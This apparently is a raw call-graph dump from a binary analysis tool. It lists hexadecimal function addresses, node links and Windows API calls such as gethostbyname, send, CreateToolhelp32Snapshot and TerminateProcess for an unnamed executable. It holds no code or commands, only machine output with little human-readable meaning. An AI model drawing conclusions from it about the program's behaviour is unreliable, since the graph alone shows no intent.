90cdb4 48 API calls 108009->108011 108009->108012 108011->108012 108012->107618 109565 9623c5 108013->109565 108017 9084a6 81 API calls 108016->108017 108018 9610fb LoadLibraryW 108017->108018 108019 96111e 108018->108019 108020 96110f 108018->108020 108019->108020 109649 9628d9 48 API calls _memmove 108019->109649 108020->107618 108023 91f48a 108022->108023 108024 91f47f 108022->108024 108027 9084a6 81 API calls 108023->108027 108058 91f498 Mailbox 108023->108058 108025 90cdb4 48 API calls 108024->108025 108025->108023 108026 92010a 48 API calls 108028 91f49f 108026->108028 108029 976841 108027->108029 108030 91f4af 108028->108030 109650 905080 49 API calls 108028->109650 108031 92297d __wsplitpath 47 API calls 108029->108031 108033 9084a6 81 API calls 108030->108033 108034 976859 108031->108034 108035 91f4bf 108033->108035 108036 90caee 48 API calls 108034->108036 108037 904bf9 56 API calls 108035->108037 108038 97686a 108036->108038 108039 91f4ce 108037->108039 109651 9039e8 48 API calls 2 library calls 108038->109651 108041 9768d4 GetLastError 108039->108041 108049 91f4d6 108039->108049 108044 9768ed 108041->108044 108042 976878 108043 976895 108042->108043 109652 946f4b GetFileAttributesW FindFirstFileW FindClose 108042->109652 108045 90cdb4 48 API calls 108043->108045 108044->108049 109653 904592 CloseHandle 108044->109653 108045->108058 108046 91f4f0 108050 92010a 48 API calls 108046->108050 108047 976920 108051 92010a 48 API calls 108047->108051 108049->108046 108049->108047 108054 91f4f5 108050->108054 108055 976925 108051->108055 108052 976888 108052->108043 108057 946d6d 52 API calls 108052->108057 108056 90197e 48 API calls 108054->108056 108059 91f50a Mailbox 108056->108059 108057->108043 108058->108026 108058->108059 108059->107618 108061 92010a 48 API calls 108060->108061 108062 9050b3 108061->108062 108063 9050ec CloseHandle 108062->108063 108064 9050be 108063->108064 108064->107618 108066 9084a6 81 API calls 108065->108066 108067 9081e5 108066->108067 108068 9084a6 81 API calls 108067->108068 108069 9081fa 108068->108069 108070 9084a6 81 API calls 108069->108070 108071 90820d 108070->108071 108072 9084a6 81 API calls 108071->108072 108073 908223 108072->108073 108074 907b6e 48 API calls 108073->108074 108075 908237 108074->108075 108076 90cdb4 48 API calls 108075->108076 108131 90846a 108075->108131 108077 90825e 108076->108077 108078 97d752 108077->108078 108103 908281 __wopenfile 108077->108103 108077->108131 108081 903320 48 API calls 108078->108081 108079 97d95f 108082 903320 48 API calls 108079->108082 108080 97d91e 108083 903320 48 API calls 108080->108083 108084 97d769 108081->108084 108085 97d96a 108082->108085 108086 97d928 108083->108086 108113 97d790 108084->108113 109671 912320 50 API calls 108084->109671 109676 912320 50 API calls 108085->109676 108088 9084a6 81 API calls 108086->108088 108092 97d93a 108088->108092 108090 9084a6 81 API calls 108093 908306 108090->108093 108091 97d985 108100 9084a6 81 API calls 108091->108100 108095 9080ea 48 API calls 108092->108095 108097 9084a6 81 API calls 108093->108097 108094 9080ea 48 API calls 108094->108113 108096 97d94e 108095->108096 108098 908182 48 API calls 108096->108098 108099 90831b 108097->108099 108104 97d95c 108098->108104 108101 97d7ed 108099->108101 108106 908342 108099->108106 108099->108131 108105 97d9a0 108100->108105 108112 903320 48 API calls 108101->108112 108101->108131 108102 908182 48 API calls 108102->108113 108103->108090 108103->108101 108123 908364 108103->108123 108103->108131 109677 912320 50 API calls 108104->109677 108107 9080ea 48 API calls 108105->108107 108110 903320 48 API calls 108106->108110 108111 97d9b4 108107->108111 108116 90834c 108110->108116 108117 908182 48 API calls 108111->108117 108114 97d84a 108112->108114 108113->108094 108113->108102 108115 90843f Mailbox 108113->108115 109672 912320 50 API calls 108113->109672 109673 912320 50 API calls 108114->109673 108115->107618 108120 90c4cd 48 API calls 108116->108120 108117->108104 108120->108123 108123->108115 108125 97d895 108123->108125 109654 9080ea 108123->109654 109666 92247b 59 API calls 2 library calls 108123->109666 109667 908182 108123->109667 109670 912320 50 API calls 108123->109670 108124 97d8ce 108127 908182 48 API calls 108124->108127 108125->108124 108126 97d8bf 108125->108126 109674 90bd2f 48 API calls _memmove 108126->109674 108128 97d8dc 108127->108128 109675 912320 50 API calls 108128->109675 108131->108079 108131->108080 108132 97d8ee 108134 90c4cd 48 API calls 108132->108134 108134->108131 108136 90a6d4 48 API calls 108135->108136 108137 9592d2 108136->108137 108138 9084a6 81 API calls 108137->108138 108139 9592e1 108138->108139 108140 91f26b 50 API calls 108139->108140 108141 9592ed gethostbyname 108140->108141 108142 95931d _memmove 108141->108142 108143 9592fa WSAGetLastError 108141->108143 108145 95932d inet_ntoa 108142->108145 108144 95930e 108143->108144 108146 90ca8e 48 API calls 108144->108146 109679 95adca 48 API calls 2 library calls 108145->109679 108148 95931b Mailbox 108146->108148 108148->107618 108149 959342 109680 95ae5a 50 API calls 108149->109680 108151 95934e 108152 907bef 48 API calls 108151->108152 108152->108148 108154 91e022 108153->108154 108155 91e034 108153->108155 108158 90d89e 50 API calls 108154->108158 108156 91e063 108155->108156 108157 91e03a 108155->108157 108160 90d89e 50 API calls 108156->108160 108159 92010a 48 API calls 108157->108159 108161 91e02c 108158->108161 108159->108161 108160->108161 108161->107588 108163 907b6e 48 API calls 108162->108163 108164 91e0b4 _wcscmp 108163->108164 108165 90caee 48 API calls 108164->108165 108168 91e0e2 Mailbox 108164->108168 108166 97b9c7 108165->108166 109681 907b4b 48 API calls Mailbox 108166->109681 108168->107618 108169 97b9d5 108170 90d2d2 53 API calls 108169->108170 108171 97b9e7 108170->108171 108172 90d89e 50 API calls 108171->108172 108173 97b9ec Mailbox 108171->108173 108172->108173 108173->107618 108174->107618 108175->107618 108176->107618 108177->107618 108178->107618 108179->107623 108180->107615 108181->107597 108182->107601 108183->107600 108184->107608 108186 90d3d2 48 API calls 108185->108186 108187 95f389 Mailbox 108186->108187 108189 95f3e1 108187->108189 108190 95f3cd 108187->108190 108204 95f3a9 108187->108204 108188 90d89e 50 API calls 108201 95f421 Mailbox 108188->108201 108191 90c935 48 API calls 108189->108191 108192 907e53 48 API calls 108190->108192 108193 95f3df 108191->108193 108192->108193 108194 95f429 108193->108194 108359 95cdb5 420 API calls 108193->108359 108353 95cd12 108194->108353 108196 95f410 108196->108194 108198 95f414 108196->108198 108360 94d338 86 API calls 4 library calls 108198->108360 108199 95f44b 108202 95f457 108199->108202 108203 95f4a2 108199->108203 108201->107711 108202->108204 108206 95f476 108202->108206 108205 95f34f 420 API calls 108203->108205 108204->108188 108205->108201 108207 90ca8e 48 API calls 108206->108207 108207->108201 108209 911606 108208->108209 108212 9114b2 108208->108212 108209->107697 108210 9114be 108216 9114c9 108210->108216 108426 90346e 48 API calls 108210->108426 108212->108210 108213 92010a 48 API calls 108212->108213 108214 975299 108213->108214 108215 92010a 48 API calls 108214->108215 108223 9752a4 108215->108223 108217 91156d 108216->108217 108218 92010a 48 API calls 108216->108218 108217->107697 108219 9115af 108218->108219 108220 9115c2 108219->108220 108425 91d6b4 48 API calls 108219->108425 108220->107697 108222 92010a 48 API calls 108222->108223 108223->108210 108223->108222 108224->107659 108225->107692 108226->107692 108227->107712 108228->107692 108229->107660 108230->107712 108231->107712 108232->107675 108233->107709 108235 914537 108234->108235 108236 91469f 108234->108236 108238 914543 108235->108238 108239 977820 108235->108239 108237 90caee 48 API calls 108236->108237 108246 9145e4 Mailbox 108237->108246 108427 914040 108238->108427 108599 95e713 420 API calls Mailbox 108239->108599 108242 97782c 108243 914639 Mailbox 108242->108243 108600 94d520 86 API calls 4 library calls 108242->108600 108243->107711 108245 914559 108245->108242 108245->108243 108245->108246 108256 961f19 134 API calls 108246->108256 108442 94dce9 108246->108442 108447 91f55e 108246->108447 108456 96352a 108246->108456 108544 959500 108246->108544 108553 9595af WSAStartup 108246->108553 108555 94efcd 108246->108555 108589 956fc3 108246->108589 108592 9050ec 108246->108592 108596 951080 108246->108596 108256->108243 108257->107702 108258->107708 108259->107714 109149 90a9a0 108260->109149 108262 9136e7 108264 913778 108262->108264 108265 97a269 108262->108265 108318 913aa8 108262->108318 109161 91bc04 86 API calls 108264->109161 109166 94d520 86 API calls 4 library calls 108265->109166 108268 97a68d 108268->108318 109187 94d520 86 API calls 4 library calls 108268->109187 108270 91bc5c 48 API calls 108324 91396b Mailbox _memmove 108270->108324 108271 97a3e9 109177 94d520 86 API calls 4 library calls 108271->109177 108272 913793 108272->108268 108272->108318 108272->108324 109154 9010e8 108272->109154 108276 97a289 108276->108271 109167 90d2d2 108276->109167 108277 97a583 108281 90fa40 420 API calls 108277->108281 108278 97a45c 109181 94d520 86 API calls 4 library calls 108278->109181 108283 97a5b5 108281->108283 108294 90d380 55 API calls 108283->108294 108283->108318 108284 97a303 108296 97a317 108284->108296 108306 97a341 108284->108306 108285 97a40f 109178 91cf79 49 API calls 108285->109178 108287 91384e 108287->108324 108298 97a5e6 108294->108298 109173 94d520 86 API calls 4 library calls 108296->109173 109185 94d520 86 API calls 4 library calls 108298->109185 108299 90fa40 420 API calls 108299->108324 108308 97a366 108306->108308 108312 97a384 108306->108312 108309 90d89e 50 API calls 108309->108324 108316 91399f 108320 90c935 48 API calls 108316->108320 108322 9139c0 108316->108322 108329 913ab5 Mailbox 108318->108329 109165 94d520 86 API calls 4 library calls 108318->109165 108319 92010a 48 API calls 108319->108324 108320->108322 108321 97a65e 108325 90d89e 50 API calls 108321->108325 108322->108318 108322->108321 108326 913a05 108322->108326 108324->108270 108324->108276 108324->108277 108324->108278 108324->108298 108324->108299 108324->108309 108324->108316 108324->108318 108324->108319 109162 90d500 53 API calls __cinit 108324->109162 109163 90d420 53 API calls 108324->109163 109164 91baef 48 API calls _memmove 108324->109164 109182 95d21a 82 API calls Mailbox 108324->109182 109183 9489e0 53 API calls 108324->109183 109184 90d772 55 API calls 108324->109184 108325->108268 108326->108268 108326->108318 108327 913a95 108326->108327 108328 90d89e 50 API calls 108327->108328 108328->108318 108329->107711 108330->107711 108331->107685 108333 9084be 108332->108333 108347 9084ba 108332->108347 108334 975592 __i64tow 108333->108334 108335 9084d2 108333->108335 108336 975494 108333->108336 108345 9084ea __itow Mailbox _wcscpy 108333->108345 109191 92234b 80 API calls 3 library calls 108335->109191 108337 97549d 108336->108337 108338 97557a 108336->108338 108343 9754bc 108337->108343 108337->108345 109192 92234b 80 API calls 3 library calls 108338->109192 108340 92010a 48 API calls 108342 9084f4 108340->108342 108346 90caee 48 API calls 108342->108346 108342->108347 108344 92010a 48 API calls 108343->108344 108348 9754d9 108344->108348 108345->108340 108346->108347 108347->107703 108349 92010a 48 API calls 108348->108349 108350 9754ff 108349->108350 108350->108347 108351 90caee 48 API calls 108350->108351 108351->108347 108352->107691 108354 95cd21 108353->108354 108358 95cd46 108353->108358 108355 90ca8e 48 API calls 108354->108355 108356 95cd2d 108355->108356 108361 95c8b7 108356->108361 108358->108199 108359->108196 108360->108201 108363 95c914 108361->108363 108364 95c8f7 108361->108364 108419 95c235 420 API calls Mailbox 108363->108419 108364->108363 108365 95cc61 108364->108365 108366 95c934 108364->108366 108367 95cc6e 108365->108367 108368 95cca9 108365->108368 108366->108363 108397 93abf3 108366->108397 108415 91d6b4 48 API calls 108367->108415 108368->108363 108371 95ccb6 108368->108371 108370 95c964 108370->108363 108372 95c973 108370->108372 108417 91d6b4 48 API calls 108371->108417 108380 95c9a1 108372->108380 108401 93a8c8 108372->108401 108374 95cc87 108416 9497b6 89 API calls 108374->108416 108378 95cc52 108378->108358 108379 95ccd6 108418 94503c 91 API calls Mailbox 108379->108418 108385 95ca4a 108380->108385 108411 93a25b 106 API calls 108380->108411 108382 95cadc VariantInit 108388 95cb11 _memset 108382->108388 108385->108382 108386 95ca86 VariantClear 108385->108386 108386->108385 108387 95caa5 SysAllocString 108386->108387 108387->108385 108389 95cb8e 108388->108389 108390 95cbb4 108388->108390 108412 95c235 420 API calls Mailbox 108389->108412 108413 94a6f6 103 API calls 108390->108413 108398 93ac16 108397->108398 108399 93ac04 __NMSG_WRITE 108397->108399 108398->108370 108399->108398 108420 903bcf 108399->108420 108402 93a8f2 108401->108402 108403 93a9ed SysFreeString 108402->108403 108404 93a90a 108402->108404 108405 93aa7e 108402->108405 108410 93a9f9 108402->108410 108403->108410 108404->108380 108405->108404 108406 93aad9 SysFreeString 108405->108406 108407 93aac9 lstrcmpiW 108405->108407 108405->108410 108406->108405 108407->108406 108409 93aafa SysFreeString 108407->108409 108409->108410 108410->108404 108424 93a78a RaiseException 108410->108424 108411->108380 108415->108374 108416->108378 108417->108379 108418->108378 108419->108378 108421 903bd9 __NMSG_WRITE 108420->108421 108422 92010a 48 API calls 108421->108422 108423 903bee _wcscpy 108422->108423 108423->108398 108424->108410 108425->108220 108426->108216 108428 97787b 108427->108428 108431 91406c 108427->108431 108602 94d520 86 API calls 4 library calls 108428->108602 108430 97788c 108603 94d520 86 API calls 4 library calls 108430->108603 108431->108430 108438 9140a6 _memmove 108431->108438 108433 914175 108439 914185 108433->108439 108601 95d21a 82 API calls Mailbox 108433->108601 108435 92010a 48 API calls 108435->108438 108436 9141f1 108436->108245 108437 90fa40 420 API calls 108437->108438 108438->108433 108438->108435 108438->108437 108438->108439 108440 9778d8 108438->108440 108439->108245 108604 94d520 86 API calls 4 library calls 108440->108604 108443 9084a6 81 API calls 108442->108443 108444 94dcfc 108443->108444 108605 946d6d 108444->108605 108446 94dd06 108446->108243 108617 90cdb4 108447->108617 108449 91f572 108450 9775d1 Sleep 108449->108450 108451 91f57a timeGetTime 108449->108451 108452 90cdb4 48 API calls 108451->108452 108453 91f590 108452->108453 108622 90e1f0 108453->108622 108457 90d3d2 48 API calls 108456->108457 108458 96354a 108457->108458 108459 90d3d2 48 API calls 108458->108459 108460 963553 108459->108460 108461 90d3d2 48 API calls 108460->108461 108462 96355c 108461->108462 108463 9084a6 81 API calls 108462->108463 108471 9635e9 Mailbox 108462->108471 108464 963580 108463->108464 108879 963d7b 108464->108879 108471->108243 108545 90cdb4 48 API calls 108544->108545 108546 959515 108545->108546 108547 94be47 50 API calls 108546->108547 108548 959522 108547->108548 108549 95952f send 108548->108549 108550 959546 108549->108550 108551 959552 WSAGetLastError 108550->108551 108552 95956a 108550->108552 108551->108552 108552->108243 108554 9595e0 108553->108554 108554->108243 108556 9084a6 81 API calls 108555->108556 108557 94eff2 108556->108557 108945 9478ad GetFullPathNameW 108557->108945 108562 94f04b CoInitialize CoCreateInstance 108564 94f070 108562->108564 108565 94f08e 108562->108565 108567 94f07a CoUninitialize 108564->108567 108566 9084a6 81 API calls 108565->108566 108590 9084a6 81 API calls 108589->108590 108591 956fd6 SetWindowTextW 108590->108591 108591->108243 108593 905105 108592->108593 108594 9050f6 108592->108594 108593->108594 108595 90510a CloseHandle 108593->108595 108594->108243 108595->108594 108961 9522e5 108596->108961 108598 951090 108598->108243 108599->108242 108600->108243 108601->108436 108602->108430 108603->108439 108604->108439 108606 946d8a __NMSG_WRITE 108605->108606 108607 946db3 GetFileAttributesW 108606->108607 108608 946dc5 GetLastError 108607->108608 108615 946de3 108607->108615 108609 946de7 108608->108609 108610 946dd0 CreateDirectoryW 108608->108610 108611 903bcf 48 API calls 108609->108611 108609->108615 108610->108609 108610->108615 108612 946df7 _wcsrchr 108611->108612 108613 946d6d 48 API calls 108612->108613 108612->108615 108614 946e1b 108613->108614 108614->108615 108616 946e28 CreateDirectoryW 108614->108616 108615->108446 108616->108615 108618 90cdc5 108617->108618 108619 90cdca 108617->108619 108618->108619 108684 922241 48 API calls 108618->108684 108619->108449 108621 90ce07 108621->108449 108623 90e216 108622->108623 108683 90e226 Mailbox 108622->108683 108624 90e670 108623->108624 108623->108683 108753 91ecee 420 API calls 108624->108753 108626 90e4fd 108626->108243 108628 90e681 108628->108626 108629 90e68e 108628->108629 108755 91ec33 420 API calls Mailbox 108629->108755 108630 90e26c PeekMessageW 108630->108683 108633 975b13 Sleep 108633->108683 108636 90e4e7 108636->108626 108754 90322e 16 API calls 108636->108754 108639 91cf79 49 API calls 108639->108683 108641 90e657 PeekMessageW 108641->108683 108642 90e517 timeGetTime 108642->108683 108644 92010a 48 API calls 108644->108683 108645 90c935 48 API calls 108645->108683 108646 90e641 TranslateMessage DispatchMessageW 108646->108641 108647 975dfc WaitForSingleObject 108649 975e19 GetExitCodeProcess CloseHandle 108647->108649 108647->108683 108648 976147 Sleep 108679 975cce Mailbox 108648->108679 108649->108683 108650 90d3d2 48 API calls 108650->108679 108651 90e6cc timeGetTime 108756 91cf79 49 API calls 108651->108756 108652 975feb Sleep 108652->108683 108657 9761de GetExitCodeProcess 108662 9761f4 WaitForSingleObject 108657->108662 108663 97620a CloseHandle 108657->108663 108659 901000 396 API calls 108659->108683 108661 975cea Sleep 108661->108683 108662->108663 108662->108683 108663->108679 108664 975cd7 Sleep 108664->108661 108665 968a48 108 API calls 108665->108679 108667 901dce 107 API calls 108667->108683 108668 976266 Sleep 108668->108683 108671 90caee 48 API calls 108671->108679 108673 90fa40 396 API calls 108673->108683 108674 90d380 55 API calls 108674->108679 108675 9144e0 396 API calls 108675->108683 108676 913680 396 API calls 108676->108683 108678 90caee 48 API calls 108678->108683 108679->108650 108679->108657 108679->108661 108679->108664 108679->108665 108679->108668 108679->108671 108679->108674 108679->108683 108758 9456dc 49 API calls Mailbox 108679->108758 108759 91cf79 49 API calls 108679->108759 108760 901000 420 API calls 108679->108760 108762 95d12a 50 API calls 108679->108762 108763 948355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 108679->108763 108764 91e3a5 timeGetTime 108679->108764 108765 946f5b CreateToolhelp32Snapshot Process32FirstW 108679->108765 108680 94d520 86 API calls 108680->108683 108682 90d380 55 API calls 108682->108683 108683->108630 108683->108633 108683->108636 108683->108639 108683->108641 108683->108642 108683->108644 108683->108645 108683->108646 108683->108647 108683->108648 108683->108651 108683->108652 108683->108659 108683->108661 108683->108667 108683->108673 108683->108675 108683->108676 108683->108678 108683->108679 108683->108680 108683->108682 108685 90e7e0 108683->108685 108692 90ea00 108683->108692 108742 91f381 108683->108742 108747 91ed1a 108683->108747 108752 90e7b0 420 API calls Mailbox 108683->108752 108757 968b20 48 API calls 108683->108757 108761 91e3a5 timeGetTime 108683->108761 108684->108621 108686 90e7fd 108685->108686 108687 90e80f 108685->108687 108772 90dcd0 108686->108772 108803 94d520 86 API calls 4 library calls 108687->108803 108691 9798e8 108691->108691 108693 90ea20 108692->108693 108694 90fa40 420 API calls 108693->108694 108699 90ea89 108693->108699 108696 979919 108694->108696 108696->108699 108811 94d520 86 API calls 4 library calls 108696->108811 108702 90d3d2 48 API calls 108699->108702 108713 90ecd7 Mailbox 108699->108713 108719 90eb18 108699->108719 108704 979963 108702->108704 108705 94d520 86 API calls 108705->108713 108713->108705 108719->108713 108744 97ee11 108742->108744 108745 91f390 108742->108745 108743 97ee46 108744->108743 108746 97ee28 TranslateAcceleratorW 108744->108746 108745->108683 108746->108745 108748 91ed2c 108747->108748 108749 91ed34 108747->108749 108748->108683 108749->108748 108750 91ed5e IsDialogMessageW 108749->108750 108751 97ebec GetClassLongW 108749->108751 108750->108748 108750->108749 108751->108749 108751->108750 108752->108683 108753->108636 108754->108628 108756->108683 108757->108683 108758->108679 108759->108679 108760->108679 108761->108683 108762->108679 108763->108679 108764->108679 108829 9479c2 108765->108829 108773 90fa40 420 API calls 108772->108773 108777 90dd0f _memmove 108773->108777 108803->108691 108811->108699 108830 9479e9 108829->108830 108834 9479d0 108829->108834 108849 92224a 58 API calls __wcstoi64 108830->108849 108833 9479ef 108834->108830 108834->108833 108848 9222df GetStringTypeW __towlower_l 108834->108848 108848->108834 108849->108833 108880 90c4cd 48 API calls 108879->108880 108881 963d89 108880->108881 108882 90c4cd 48 API calls 108881->108882 108883 963d91 108882->108883 108946 907e53 48 API calls 108945->108946 108947 9478df 108946->108947 108948 91e617 48 API calls 108947->108948 108949 9478eb 108948->108949 108950 95267a 108949->108950 108951 9526a4 __NMSG_WRITE 108950->108951 108952 94f039 108951->108952 108954 9526d8 108951->108954 108956 952763 108951->108956 108952->108562 108957 9039e8 48 API calls 2 library calls 108952->108957 108954->108952 108959 91dfd2 60 API calls 108954->108959 108956->108952 108960 91dfd2 60 API calls 108956->108960 108957->108562 108959->108954 108960->108956 108962 952306 108961->108962 108963 952365 108962->108963 108964 95230a 108962->108964 109030 91f0f3 48 API calls 108963->109030 108965 92010a 48 API calls 108964->108965 108967 952311 108965->108967 108968 95231f 108967->108968 109017 905080 49 API calls 108967->109017 108970 9084a6 81 API calls 108968->108970 108972 952331 108970->108972 108971 952379 108973 95234d 108971->108973 108975 95243f 108971->108975 108978 9523bb 108971->108978 109018 904bf9 108972->109018 108973->108598 108976 94be47 50 API calls 108975->108976 108979 952446 108976->108979 108981 9084a6 81 API calls 108978->108981 109037 94689f SetFilePointerEx SetFilePointerEx WriteFile 108979->109037 108988 9523c2 108981->108988 108983 9523f6 108999 9467dc 108983->108999 108986 952400 109031 907b6e 108986->109031 108988->108983 108988->108986 108993 9523fe Mailbox 108993->108973 108995 9050ec CloseHandle 108993->108995 108997 952490 108995->108997 109038 904592 CloseHandle 108997->109038 109000 9467f6 108999->109000 109001 9467ec 108999->109001 109003 9467fc 109000->109003 109004 946808 109000->109004 109055 946917 SetFilePointerEx SetFilePointerEx WriteFile 109001->109055 109056 9468b9 51 API calls 109003->109056 109006 946824 109004->109006 109007 946811 109004->109007 109017->108968 109019 9050ec CloseHandle 109018->109019 109020 904c04 109019->109020 109095 904b88 109020->109095 109030->108971 109032 92010a 48 API calls 109031->109032 109033 907b93 109032->109033 109037->108993 109038->108973 109096 974957 109095->109096 109097 904ba1 CreateFileW 109095->109097 109150 90a9af 109149->109150 109153 90a9ca 109149->109153 109151 90b8a7 48 API calls 109150->109151 109152 90a9b7 CharUpperBuffW 109151->109152 109152->109153 109153->108262 109155 9010f9 109154->109155 109156 974c5a 109154->109156 109157 92010a 48 API calls 109155->109157 109158 901100 109157->109158 109159 901121 109158->109159 109188 90113c 48 API calls 109158->109188 109159->108287 109161->108272 109162->108324 109163->108324 109164->108324 109165->108329 109166->108272 109168 90d30a 109167->109168 109169 90d2df 109167->109169 109168->108284 109168->108285 109172 90d2e6 109169->109172 109190 90d349 53 API calls 109169->109190 109172->109168 109189 90d349 53 API calls 109172->109189 109173->108318 109177->108318 109181->108318 109182->108324 109183->108324 109184->108324 109185->108318 109187->108318 109188->109159 109189->109168 109190->109172 109191->108345 109192->108345 109193->107722 109194->107722 109195->107722 109196->107722 109197->107722 109198->107753 109199->107726 109200->107724 109201->107737 109202->107730 109203->107738 109205 947700 109204->109205 109214 9476f9 _wcsncpy 109204->109214 109206 92010a 48 API calls 109205->109206 109207 947706 GetFileVersionInfoW 109206->109207 109208 947722 __NMSG_WRITE 109207->109208 109209 92010a 48 API calls 109208->109209 109212 947739 _wcscat _wcscmp _wcscpy _wcsstr 109209->109212 109210 921bc7 _W_store_winword 59 API calls 109211 9477f7 109210->109211 109213 947827 VerQueryValueW 109211->109213 109211->109214 109215 947793 _wcscat 109212->109215 109216 947779 VerQueryValueW 109212->109216 109213->109214 109217 94783d _wcscmp 109213->109217 109214->107780 109215->109210 109216->109215 109217->109214 109219 92234b 80 API calls 3 library calls 109217->109219 109219->109214 109228 95ae3b 109220->109228 109223 95ad05 Mailbox 109224 95ad31 htons 109223->109224 109225 95ad1b 109223->109225 109224->109225 109225->107792 109227 94d7f2 109226->109227 109227->107799 109229 90a6d4 48 API calls 109228->109229 109230 95ae49 109229->109230 109233 95ae79 WideCharToMultiByte 109230->109233 109232 95acf3 inet_addr 109232->109223 109234 95aea7 109233->109234 109235 95ae9d 109233->109235 109237 92010a 48 API calls 109234->109237 109236 91f324 48 API calls 109235->109236 109240 95aea5 109236->109240 109238 95aeae WideCharToMultiByte 109237->109238 109239 91f2d0 48 API calls 109238->109239 109239->109240 109240->109232 109241->107838 109242->107877 109243->107880 109245 907c3a 109244->109245 109246 907bfb 109244->109246 109247 90c935 48 API calls 109245->109247 109248 92010a 48 API calls 109246->109248 109249 907c0e 109247->109249 109248->109249 109249->107878 109250->107878 109252 90d89e 50 API calls 109251->109252 109253 901a08 109252->109253 109254 901a12 109253->109254 109255 97db7d 109253->109255 109257 9084a6 81 API calls 109254->109257 109256 907e53 48 API calls 109255->109256 109259 97db8d 109256->109259 109258 901a1f 109257->109258 109260 90c935 48 API calls 109258->109260 109259->109259 109261 901a2d 109260->109261 109262 901dce 109261->109262 109263 901de4 Mailbox 109262->109263 109264 97db26 109263->109264 109268 901dfd 109263->109268 109265 97db2b IsWindow 109264->109265 109266 901e51 109265->109266 109267 97db3f 109265->109267 109266->107891 109330 90200a 109267->109330 109269 901e46 109268->109269 109270 9084a6 81 API calls 109268->109270 109269->109266 109274 97db65 IsWindow 109269->109274 109272 901e17 109270->109272 109277 901f04 109272->109277 109274->109266 109274->109267 109278 901f1a Mailbox 109277->109278 109279 90c935 48 API calls 109278->109279 109280 901f3e 109279->109280 109281 90c935 48 API calls 109280->109281 109282 901f49 109281->109282 109283 907e53 48 API calls 109282->109283 109284 901f59 109283->109284 109285 90d3d2 48 API calls 109284->109285 109286 901f87 109285->109286 109287 90d3d2 48 API calls 109286->109287 109288 901f90 109287->109288 109289 90d3d2 48 API calls 109288->109289 109290 901f99 109289->109290 109331 902016 109330->109331 109332 92010a 48 API calls 109331->109332 109333 902023 109332->109333 109334 90197e 109333->109334 109335 901990 109334->109335 109339 9019af _memmove 109334->109339 109338 92010a 48 API calls 109335->109338 109336 92010a 48 API calls 109337 9019c6 109336->109337 109337->109266 109338->109339 109339->109336 109376 90c4cd 48 API calls 109375->109376 109377 93e2fe 109376->109377 109392 90193b SendMessageTimeoutW 109377->109392 109379 93e305 109391 93e309 Mailbox 109379->109391 109393 93e390 109379->109393 109381 93e314 109382 92010a 48 API calls 109381->109382 109383 93e338 SendMessageW 109382->109383 109384 93e34e _strlen 109383->109384 109383->109391 109385 93e35a 109384->109385 109386 93e378 109384->109386 109398 93e0f5 48 API calls 2 library calls 109385->109398 109388 907e53 48 API calls 109386->109388 109388->109391 109389 93e362 109399 90c610 MultiByteToWideChar 109389->109399 109391->107903 109392->109379 109418 90193b SendMessageTimeoutW 109393->109418 109395 93e39a 109396 93e3a2 SendMessageW 109395->109396 109397 93e39e 109395->109397 109396->109381 109397->109381 109398->109389 109400 9724df 109399->109400 109401 90c638 109399->109401 109403 90c4cd 48 API calls 109400->109403 109402 92010a 48 API calls 109401->109402 109404 90c64f MultiByteToWideChar 109402->109404 109405 9724e7 109403->109405 109406 90c6b7 109404->109406 109407 90c66c 109404->109407 109411 90a6f8 48 API calls 109405->109411 109407->109406 109418->109395 109419->107919 109420->107936 109421->107936 109422->107946 109423->107938 109424->107936 109425->107934 109427 91f057 109426->109427 109428 91f069 109426->109428 109429 91f063 109427->109429 109430 91f05d 109427->109430 109431 90c4cd 48 API calls 109428->109431 109433 90a6d4 48 API calls 109429->109433 109432 90a6d4 48 API calls 109430->109432 109441 9464f5 109431->109441 109435 91f081 109432->109435 109436 94668b 109433->109436 109434 946524 109434->107981 109455 904c4f 109435->109455 109439 904c4f 50 API calls 109436->109439 109440 946699 109439->109440 109443 9466a9 Mailbox 109440->109443 109463 946765 50 API calls 109440->109463 109441->109434 109461 94649b ReadFile SetFilePointerEx 109441->109461 109462 90bd2f 48 API calls _memmove 109441->109462 109443->107981 109444 9749b2 109447 90c610 50 API calls 109448 91f0a3 Mailbox 109447->109448 109448->107981 109449->107958 109450->107985 109451->107955 109452->107962 109453->107977 109454->107983 109456 91f324 48 API calls 109455->109456 109459 904c60 109456->109459 109457 904c95 109457->109444 109457->109447 109458 904ca0 2 API calls 109458->109459 109459->109457 109459->109458 109464 904d29 109459->109464 109461->109441 109462->109441 109463->109443 109465 9745cf 109464->109465 109466 904d3d 109464->109466 109468 90a6f8 48 API calls 109465->109468 109473 904d67 109466->109473 109470 9745da 109468->109470 109469 904d49 109469->109459 109471 92010a 48 API calls 109470->109471 109472 9745ef _memmove 109471->109472 109474 904d7d 109473->109474 109477 904d78 _memmove 109473->109477 109475 974703 109474->109475 109476 92010a 48 API calls 109474->109476 109476->109477 109477->109469 109479 91dd89 109478->109479 109480 974a7d FindFirstFileW 109478->109480 109479->107618 109481 974a95 FindClose 109480->109481 109482 974a8e 109480->109482 109482->109481 109484 9084a6 81 API calls 109483->109484 109485 95f7db 109484->109485 109508 95f81d Mailbox 109485->109508 109519 960458 109485->109519 109487 95fa7c 109488 95fbeb 109487->109488 109492 95fa86 109487->109492 109554 960579 89 API calls Mailbox 109488->109554 109491 95fbf8 109491->109492 109494 95fc04 109491->109494 109532 95f5fb 109492->109532 109493 9084a6 81 API calls 109512 95f875 Mailbox 109493->109512 109494->109508 109499 95faba 109546 91f92c 109499->109546 109502 95fad4 109552 94d520 86 API calls 4 library calls 109502->109552 109503 95faee 109505 903320 48 API calls 109503->109505 109506 95fb05 109505->109506 109509 9114a0 48 API calls 109506->109509 109518 95fb2f 109506->109518 109507 95fadf GetCurrentProcess TerminateProcess 109507->109503 109508->107998 109511 95fb1e 109509->109511 109510 95fc56 109510->109508 109515 95fc6f FreeLibrary 109510->109515 109553 960300 105 API calls _free 109511->109553 109512->109487 109512->109493 109512->109508 109512->109512 109550 9628d9 48 API calls _memmove 109512->109550 109551 95fc96 60 API calls 2 library calls 109512->109551 109514 9114a0 48 API calls 109514->109518 109515->109508 109517 90d89e 50 API calls 109517->109518 109518->109510 109518->109514 109518->109517 109555 960300 105 API calls _free 109518->109555 109520 90b8a7 48 API calls 109519->109520 109521 960473 CharLowerBuffW 109520->109521 109522 95267a 60 API calls 109521->109522 109523 960494 109522->109523 109525 90d3d2 48 API calls 109523->109525 109531 9604cf Mailbox 109523->109531 109526 9604ac 109525->109526 109527 907f40 48 API calls 109526->109527 109529 9604c3 109527->109529 109528 96050b Mailbox 